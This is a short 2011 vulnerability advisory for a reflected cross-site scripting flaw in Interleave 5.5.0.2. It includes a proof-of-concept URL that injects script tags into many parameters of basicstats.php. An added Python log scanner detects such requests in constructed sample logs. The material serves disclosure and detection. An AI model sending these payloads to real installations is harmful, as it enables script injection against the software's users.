
Interleave 5.5.0.2 Cross Site Scripting

Posted on 07 March 2011

------------------------------------------------------------------------
Software................Interleave 5.5.0.2
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://www.interleave.nl/en/
Release Date............3/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
........................Bryce Darling <bryce@autosectools.com>
------------------------------------------------------------------------

--Description--

A reflected cross-site scripting vulnerability in Interleave 5.5.0.2 can be exploited to execute arbitrary JavaScript.

--PoC--

http://localhost/interleave-5.5.0.2-stable-20110227/basicstats.php?AjaxHandler=0<script>alert(0)<%2fscript>&e=1<script>alert(0)<%2fscript>&eid=2<script>alert(0)<%2fscript>&id=3<script>alert(0)<%2fscript>&recordid=4<script>alert(0)<%2fscript>&templateid=5<script>alert(0)<%2fscript>&fileid=6<script>alert(0)<%2fscript>&tid=7<script>alert(0)<%2fscript>&username=8<script>alert(0)<%2fscript>&password=9<script>alert(0)<%2fscript>&repository=10<script>alert(0)<%2fscript>&GetCSS=11<script>alert(0)<%2fscript>&GetjQueryUiPlacementJS=12<script>alert(0)<%2fscript>&ShowEntityList=13<script>alert(0)<%2fscript>&ShowTable=14<script>alert(0)<%2fscript>&nonavbar=15<script>alert(0)<%2fscript>&tab=16<script>alert(0)<%2fscript>&CT=17<script>alert(0)<%2fscript>
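
A log check for requests shaped like the PoC above, as an added example that is not part of the original advisory: it percent-decodes every query parameter sent to basicstats.php (repeatedly, to catch double encoding) and reports the parameters whose value contains an HTML tag opener. The log lines, client address, timestamps and all function names are constructed for illustration; only the install path and parameter names come from the PoC URL.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

BASE = "/interleave-5.5.0.2-stable-20110227"  # install path taken from the PoC URL

def _line(target):
    # Constructed combined-log-style entry; address and timestamp are made up.
    return f'203.0.113.9 - - [07/Mar/2011:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512'

SAMPLE_LOG = [  # constructed sample input, not real traffic
    _line(BASE + "/basicstats.php?tab=2&CT=1"),
    _line(BASE + "/basicstats.php?AjaxHandler=0<script>alert(0)<%2fscript>&e=1<script>alert(0)<%2fscript>"),
    _line(BASE + "/basicstats.php?tab=16%3Cscript%3Ealert(0)%3C%2Fscript%3E"),
    _line(BASE + "/basicstats.php?eid=2%253Cscript%253E&id=3"),
    _line(BASE + "/index.php?q=%3Cb%3E"),
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z!]")  # start of an HTML tag, e.g. <script or </script

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line, script="basicstats.php"):
    """Return the query parameter names whose decoded value contains a tag opener."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/" + script):
        return []
    return [name for name, value in parse_qsl(url.query, keep_blank_values=True)
            if TAG_RE.search(fully_decode(value))]

def scan(lines):
    """Map line index -> flagged parameter names, skipping clean lines."""
    report = {}
    for index, line in enumerate(lines):
        flagged = suspicious_params(line)
        if flagged:
            report[index] = flagged
    return report
```

Calling `scan(SAMPLE_LOG)` flags the raw, single-encoded and double-encoded requests and leaves the benign request and the request to a different script alone.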

 
